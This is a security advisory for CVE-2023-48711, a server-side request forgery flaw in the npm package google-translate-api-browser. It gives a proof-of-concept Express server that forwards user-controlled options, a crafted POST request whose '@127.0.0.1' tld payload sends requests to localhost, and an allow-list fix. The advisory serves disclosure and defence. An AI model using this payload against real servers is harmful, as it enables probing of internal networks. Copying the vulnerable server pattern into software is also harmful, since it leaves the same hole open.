CVE-2023-48711 – google-translate-api-browser
Package
Manager: npm
Name: google-translate-api-browser
Vulnerable Version: >=0 <4.1.0
Severity
Level: Low
CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
EPSS: 0.00063 (percentile: 0.19843)
Details
google-translate-api-browser Server-Side Request Forgery (SSRF) Vulnerability

### Summary

A Server-Side Request Forgery (SSRF) vulnerability is present in applications that use the `google-translate-api-browser` package and expose the `translateOptions` to the end user. An attacker can set a malicious `tld`, causing the application to return unsafe URLs pointing towards local resources.

### Details

The `translateOptions.tld` field is not properly sanitized before being placed in the Google Translate URL. This allows an attacker with control over the `translateOptions` to set the `tld` to a payload such as `@127.0.0.1`. The full URL then becomes `https://translate.google.@127.0.0.1/...`, where `translate.google.` is the username used to connect to localhost.

### PoC

Imagine a server running the following code (closely mimicking the code present in the package's README):

```javascript
const express = require('express');
const { generateRequestUrl, normaliseResponse } = require('google-translate-api-browser');
const https = require('https');

const app = express();
app.use(express.json());

app.post('/translate', async (req, res) => {
  // `options` comes straight from the request body, so the caller controls `tld`.
  const { text, options } = req.body;
  const url = generateRequestUrl(text, options);

  // The server fetches whatever host the generated URL resolves to.
  https.get(url, (resp) => {
    let data = '';
    resp.on('data', (chunk) => {
      data += chunk;
    });
    resp.on('end', () => {
      res.json(normaliseResponse(JSON.parse(data)));
    });
  }).on("error", (err) => {
    console.log("Error: " + err.message);
  });
});

const port = 3000;
app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});
```

An attacker can then send the following POST request to `/translate`:

```
POST /translate HTTP/1.1
Host: localhost:3000
Content-Type: application/json
Content-Length: 51

{"text":"Hello","options": {"tld": "@127.0.0.1"} }
```

This will cause a request to be sent to the localhost of the server running the Node application.

### Impact

An attacker can send requests within internal networks and the local host. Should any HTTPS application be present on the internal network with a vulnerability exploitable via a GET call, then it would be possible to exploit this using this vulnerability.
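As an added example (not code from the package or the advisory), the following sketch shows how a WHATWG URL parser splits the string built from the `@127.0.0.1` payload, and how an application can allow-list `tld` and re-check the parsed host before making any request. `buildUrl`, the `/placeholder-path` path, the allow-list contents and the `com` default are assumptions made for illustration.

```javascript
// Added example. buildUrl is a hypothetical stand-in for the URL shape the
// advisory describes; it is not the package's generateRequestUrl.
function buildUrl(tld) {
  return `https://translate.google.${tld}/placeholder-path`;
}

// Constructed sample allow-list: keep only the suffixes your application needs.
const ALLOWED_TLDS = new Set(['com', 'cn', 'co.uk']);

// Show how a WHATWG URL parser splits the string built from a given tld.
function inspect(tld) {
  const u = new URL(buildUrl(tld));
  return { username: u.username, hostname: u.hostname };
}

// Defence in depth: parse the final URL and check where it really points.
function pointsAtGoogleTranslate(urlString) {
  let u;
  try { u = new URL(urlString); } catch { return false; }
  const prefix = 'translate.google.';
  return u.protocol === 'https:' && u.username === '' && u.password === '' &&
    u.port === '' && u.hostname.startsWith(prefix) &&
    ALLOWED_TLDS.has(u.hostname.slice(prefix.length));
}

// Validate user-supplied options before any request is made.
function safeUrlFor(options = {}) {
  // The 'com' default is an assumption of this example.
  const tld = options.tld === undefined ? 'com' : options.tld;
  if (typeof tld !== 'string' || !ALLOWED_TLDS.has(tld)) {
    throw new Error('rejected tld');
  }
  const url = buildUrl(tld);
  if (!pointsAtGoogleTranslate(url)) throw new Error('rejected url');
  return url;
}
```

An exact-match allow-list is used rather than a character filter because a syntactically valid suffix can still place the host under a domain the caller controls. The check complements moving off the vulnerable version range listed above.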
Metadata
Created: 2023-11-27T23:30:14Z
Modified: 2023-11-27T23:30:14Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-4233-7q5q-m7p6/GHSA-4233-7q5q-m7p6.json
CWE IDs: ["CWE-918"]
Alternative ID: GHSA-4233-7q5q-m7p6
Finding: F100
Auto approve: 1